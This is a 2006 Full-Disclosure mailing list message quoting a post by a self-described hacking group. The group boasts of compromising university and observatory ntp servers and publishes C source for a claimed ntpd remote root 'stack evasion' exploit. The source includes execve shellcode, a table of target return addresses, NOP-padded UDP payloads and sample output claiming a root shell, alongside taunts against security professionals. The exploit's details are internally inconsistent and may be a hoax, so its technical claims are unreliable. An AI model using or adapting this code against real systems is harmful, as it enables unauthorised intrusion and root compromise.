 
Date: Wed Jan 11 08:56:36 2006
From: skodliv at gmail.com (poo)
Subject: ntpd stack evasion 0day exploit

good to see the pr0j3kt is still rolling!!

On 1/10/06, !bSt bitwarz Security Team <bitwarz@...il.com> wrote:
>
>
> We are a cell of pr0j3kt m4yh3m in Latin America and western Europe.
> We have owned many research centers in Latin America, for example the
> ntp server at Observatorio Nacional, USP and UFRJ, in Brazil, home of our
> member
> ronaldinh0 and in many European universities, especially those known by
> their
> high-profile computer science departments That's all. Keep the fucking
> pr0j3kt m4yh3m
> alive. Don't be confused by the evil words of
> the CISSPs and white hats.
>
> <-->ntpd_stack_evasion.c<-->
> /* ntpd remote root no-exec stack evasion spl0it
>  * by m0sk0v
>  *
>  * Ntpd is time protocol most used in *nix distros.
>  *
>  * Due to a buffer overflow in dump_srv.c is possible to execute
>  * arbitrary code in remote host by setting "HUG=" variable
>  * upon time protocol.
>  *
>  * This works even on stack protection using heap to
>  * alock data
>  *
>  * 0day!!!!!
>  * 0day!!!!!
>  * 0day!!!!!
>  * 0day!!!!!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  * PRIVATE! DONT LEAK THIS EXPLOIT!
>  *
>  *
>  * Gr33tZ to :
>  * Marcos Flavio Assuncao (defhack.com), Denny Roger/www.batori.com.br
> (thx for
>  * the shellcode, buddy!), ACME Security (www.acmesecurity.org), ksh
>  *
>  * [m0sk0v@...sko m0sk0v]$ ./ntpd_stack_evasion.c -t2 localhost
>  * ntpd_stack_evasion.c by m0sk0v
>  *
>  * Selected platform: RedHat Linux 9.0 with ntpd 4.0.99k-RPM (/tmp/sh)
>  *
>  * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
>  * [1] <- evil query (pkt = 512 | shell = 45)
>  * [2] <- null query (pkt = 12)
>  * /tmp/sh was hacked.
>  * [m0sk0v@...sko m0sk0v]$ ls -al /tmp/suid-shell
>  * -rwsr-xr-x    1 root     bin       512540 Aug 22  2005 /tmp/suid-shell
>  *
>  */
>
> #include <stdio.h>
> #include <stdlib.h >
> #include <stdarg.h>
> #include <string.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <netdb.h>
> #include <unistd.h>
> #include <arpa/inet.h>
>
> #define NOP    0x90
> #define ADDRS    8
> #define PKTSIZ    512
>
> static char usage[] = "Use: ntpd_stack_evasion.c [-o offset] <-t type>
> <hostname>";
>
> /* generic execve() shellcodes */
>
> char lin_execve[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>
>         "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
>
> char bsd_execve[] =
>  /* specially made by denny@...ori.com.br for ntpd_stack_evasion.c by
> m0sk0v */
>  /* thanks for that, buddy! */
>         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
>         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
>         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/suid-shell\x01\x01"
>
> "\x01\x01\x02\x02\x02\x02\x03\x00\x03\x03\x03\x9a\x04\x04\x04\x07\x04";
>
> struct platforms
> {
>     char *os;
>     char *version;
>     char *code;
>     long ret;
>     int align;
>     int shalign;
>     int port;
> };
>
>
> struct platforms targ[] =
> {
>     { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
>         0xbfbff8bc, 200, 220, 0 },
>
>     { "FreeBSD 5.4-STABLE", "4.0.99k (/tmp/suid-shell)", bsd_execve,
>         0xbfbff540, 200, 220, 0 },
>
>     { "RedHat Linux 9.0", "4.0.99k-RPM (/tmp/suid-shell)", lin_execve,
>         0xbffff777, 240, 160, 0 },
>
>     { NULL, NULL, NULL, 0x0, 0, 0, 0 }
> };
>
> long getip(name)
> char *name;
> {
>     struct hostent *hp;
>     long ip;
>     extern int h_errno;
>
>     if ((ip = inet_addr(name)) < 0)
>     {
>         if (!(hp = gethostbyname(name)))
>         {
>             fprintf(stderr, "gethostbyname(): %s\n",
>                 strerror(h_errno));
>             exit(1);
>         }
>         memcpy(&ip, (hp->h_addr), 4);
>     }
>
>     return ip;
> }
>
> int doquery(host, ret, shellcode, align, shalign)
> char *host, *shellcode;
> long ret;
> int align, shalign;
> {
>     /* tcpdump-based reverse engineering :)) */
>
>     char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
>               0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
>               0x74, 0x75, 0x6d, 0x3d };
>
>     char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
>               0x00, 0x00, 0x00, 0x00 };
>
>     char buf[PKTSIZ], *p;
>     long *ap;
>     int i;
>
>     int sockfd;
>     struct sockaddr_in sa;
>
>     bzero(&sa, sizeof(sa));
>
>     sa.sin_family = AF_INET;
>     sa.sin_port = htons(123);
>     sa.sin_addr.s_addr = getip(host);
>
>     if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
>     {
>         perror("socket");
>         return -1;
>     }
>
>     if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
>     {
>         perror("connect");
>         close(sockfd);
>         return -1;
>     }
>
>     memset(buf, NOP, PKTSIZ);
>     memcpy(buf, q2, sizeof(q2));
>
>     p = buf + align;
>     ap = (unsigned long *)p;
>
>     for(i=0;i<ADDRS/4;i++)
>         *ap++ = ret;
>
>     p = (char *)ap;
>
>     memcpy(buf+shalign, shellcode, strlen(shellcode));
>
>     if((write(sockfd, buf, PKTSIZ)) < 0)
>     {
>         perror("write");
>         close(sockfd);
>         return -1;
>     }
>
>     fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
>         strlen(shellcode));
>     fflush(stderr);
>
>         if ((write(sockfd, q3, sizeof(q3))) < 0)
>         {
>                 perror("write");
>                 close(sockfd);
>                 return -1;
>         }
>
>     fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
>     fflush(stderr);
>
>     close(sockfd);
>
>     return 0;
> }
>
> int main(argc, argv)
> int argc;
> char **argv;
> {
>     extern int optind, opterr;
>     extern char *optarg;
>     int ch, type, ofs, i;
>     long ret;
>
>     opterr = ofs = 0;
>     type = -1;
>
>     while ((ch = getopt(argc, argv, "t:o:")) != -1)
>         switch((char)ch)
>         {
>             case 't':
>                 type = atoi(optarg);
>                 break;
>
>             case 'o':
>                 ofs = atoi(optarg);
>                 break;
>
>             case '?':
>             default:
>                 puts(usage);
>                 exit(0);
>
>         }
>
>     argc -= optind;
>     argv += optind;
>
>     fprintf(stderr, "ntpd_stack_evasion.c by m0sk1t0\n\n");
>
>     if (type < 0)
>     {
>         fprintf(stderr, "Please select platform:\n");
>         for (i=0;targ[i].os;i++)
>         {
>             fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
>             targ[i].os, targ[i].version, (void *)targ[i].ret);
>         }
>
>         exit(0);
>     }
>
>     fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
>             targ[type].os, targ[type].version);
>
>     ret = targ[type].ret;
>     ret += ofs;
>
>     if (argc != 1)
>     {
>         puts(usage);
>         exit(0);
>     }
>
>     fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending
> query\n",
>         (void *)ret, targ[type].align, targ[type].shalign);
>
>     if (doquery(*argv, ret, targ[type].code, targ[type].align,
>         targ[type].shalign) < 0)
>     {
>         fprintf(stderr, "Failed.\n");
>         exit(1);
>     }
>
>     fprintf(stderr, "Done.\n");
>
>     if (!targ[type].port)
>     {
>         fprintf(stderr, "/tmp/suid-shell was hacked.\n");
>         exit(0);
>     }
>
>     exit(0);
> }
> <-->ntpd_stack_evasion.c<-->
>
> Thanks to Denny Roger @ Batori Software for his support
>
> --
> bitwarz Security Team  !bST
> http://bitwarz.narod.ru
>
> # Save a bug, kill a white hat!
>
>
> --
> bitwarz Security Team  !bST
> http://bitwarz.narod.ru
>
> # Save a bug, kill a white hat!
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
smile tomorrow will be worse
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060111/ea8b38b0/attachment.html

